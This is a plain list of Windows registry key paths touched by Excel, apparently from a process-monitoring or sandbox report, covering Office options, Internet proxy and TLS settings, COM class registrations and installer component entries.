HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\AttemptDisabledActionMessage
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\excel\TasRequestPending
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\CurrentSkuIdForApp\Excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\SplashScreenLicense
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableRobustifiedUNC
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING\EXCEL.EXE
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\EXCEL.EXE
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\*
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Font
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\FromCacheTimeout
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CertificateRevocation
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DisableKeepAlive
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\IdnEnabled
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\PreConnectLimit
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SqmHttpStreamRandomUploadPoolSize
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CacheMode
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBasicOverClearChannel
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ClientAuthBuiltInUI
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableAutoProxyResultCache
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisplayScriptDownloadFailureUI
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSServername
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UTF8ServerNameRes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DisableReadRange
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\KeepAliveTimeout
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxHttpRedirects
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\MemoryLevelOverride
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\UndoHistory
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DontSupportUndoForLargePivotTables
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\PivotTableUndoRowThousandCount
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DontSupportUndoForLargeDataModels
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\PivotTableUndoDataModelSize
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\PreferExcelDataModel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\DisableIdleMemoryFlush
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\DisableEDPIsIdentityManagedGate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableMergeInstance
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerProxy
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ServerInfoTimeout
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DisableNTLMPreAuth
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ScavengeCacheLowerBound
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CertCacheNoValidate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLifeTime
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\HttpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\FtpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\LeashLegacyCookies
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SendExtraCRLF
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\WpadSearchAllDomains
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttpTrace
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ShareCredsWithWinHttp
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MimeExclusionListForCache
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\HeaderExclusionListForCache
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEnabled
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEntries
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheTimeout
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups\1
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\FormulaBarExpandedLines
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\FormulaBarExpanded
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPost
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\WarnAlwaysOnPost
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnZoneCrossing
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnBadCertRecving
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\AlwaysDrainOnRedirect
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnHTTPSToHTTPRedirect
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\TcpAutotuning
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\NameBoxWidth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\3dDialogs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\MsoTbCust
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\CmdBarData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\BtnSize
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\Tooltips
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\EnablePaneManagement
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\Settings\Microsoft Excel AWDropdownHidden
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\OverridePointerMode
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\RulesSelectionCriteriaTestId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\FileFormatBallotBoxTelemetryConfirmationEventSent
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\FileFormatBallotBoxShowAttempts
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\FileFormatBallotBoxTelemetryEventSent
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\ShownFileFmtPrompt
HKEY_CURRENT_USER\Control Panel\International\Geo\Nation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\FileFormatBallotBoxAppIDBootedOnce
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBranchCache
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\UseFirstAvailable
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CombineFalseStartData
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DisableFalseStartBlocklist
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnforceP3PValidity
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DuoProtocols
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSpdyDebugAsserts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\DisableADALatopWAMOverride
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ADUserName
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\SignedOutADUser
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\DisableWinHttpCertAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\EnableStackOverwriteProtectionExperiment
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\SignedOutMSAUser
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ConnectedAccountCID
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\MigrateProxy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\InMS
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Security\NoOleLoadFromStreamChecks
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Sort
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TrustCenter\EnableLogging
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\BlockContentExecutionFromInternet
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options\FontSmoothingThreshold
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{529a9e6b-6587-4f23-ab9e-9c7d683e3c50}\InsecureQI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\EnableAnchorContext
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Common\DiagnosticMode
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TurnOffPhotograph
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{0142869F-3C91-4532-B21C-FA3FB67E7E37}_{5082518F-199F-471A-A7DB-EF9850F5E9AB}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DrawInkTab
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadExpirationDays
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{0142869F-3C91-4532-B21C-FA3FB67E7E37}_{5082518F-199F-471A-A7DB-EF9850F5E9AB}\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{0142869F-3C91-4532-B21C-FA3FB67E7E37}_{5082518F-199F-471A-A7DB-EF9850F5E9AB}\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{0142869F-3C91-4532-B21C-FA3FB67E7E37}_{5082518F-199F-471A-A7DB-EF9850F5E9AB}\WpadDetectedUrl
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}\InprocServer32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DeveloperTools
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\CustomUIRoaming
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\UseMockCollabCoordinator
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\DisableDocumentChat
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\HideBuiltInTableStyles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\HideBuiltInStyles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\RoamingLastSyncTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\RoamingConfigurableSettings
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\CEIPSampledIn
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DisableConnectionReuse
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\NOFPU
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Randomize
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\EnableAltOOMError
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\RoamingLastWriteTime
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Features\00006109F00000000000000000F01FEC\ExcelPowerQueryFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F00000000000000000F01FEC\Features\ExcelPowerQueryFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7DDAC159E5E0B0454838719402146600\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BD03B9C9D0C0DB75CB51F6940BB8AC85\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5150D8D5D4583CE5B9883DAFF077BB19\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\949581DB58C70B050A956407E91FF320\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2D260493F18242A549E2539558B745E9\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3E01F6698002DC75BAFB865751BB4651\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5488E92D8586F7852BADD11262110187\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A7F82185AF9AFA55D97244B053C3E5AB\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6CAF5874817B1FC568D5DD397C01C911\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\AD4B7679525A5A957931C1DDBA307A00\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\992DB732156E83755A56389DAD7D0ECE\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5994F54A6A438B25B8B2AE7F9833D587\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E092BB0653712E15C939364BD8C2759D\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1A015EC5390CAF658AF3375E4D09E12D\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\8E2F0C3E855739551A4C648DE279F6D2\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\13C0D2AA0762B6E54B178C647A4E9DCB\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\126AA9BD578C9B151953835E7A3239B1\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\66B452BDE8AC5F753910CD8885127436\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\644650B47F4E58753A7CA00EEDAB32C6\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B66837CFAE1CEA35D8D9CFB757D2A1D3\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F94756EC9084B5855B021E590B5C42B8\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4C21A607174D4435EB1BB87BD3AC4980\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C817DEFD49999F0589CFC0C67B55141B\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\EE27E156CC594D156B81D6EAA9129E8B\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\04416D4D36E5FFB58BC251E181CD659A\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A6DDB2BF381AFB451BDB434E47B9FD02\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A1937C22BE8626F5AB2FBF4C87E9D92A\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\CF305BE65F72B5A53A1C625B79F89117\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\478D5F7FBA2947858B5F9D3F0B48099B\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6BB8980787E9E0C529C42D07C8A39A02\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3E71086496FDAC354B6A0B1986D1E3A0\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\35B363CAF61629752BF5212B2F9BB076\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\78CA8F34E6B123B5289352D0A80A33F0\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6562F861960CE9B54986DF761B9F4058\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\EB7A08730F63CBA5DBFB539B58417D18\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B872013064538C75CAC38A3CCABDB1ED\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A92D5E25537ED915987DC0B2D3860938\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\574993135BF482457B88368631DF2A66\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\8EA0DE4DBB65C01549D39AD330CCE285\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B8D973C0F713FC450B980245A9A6A5DF\00006109F00000000000000000F01FEC
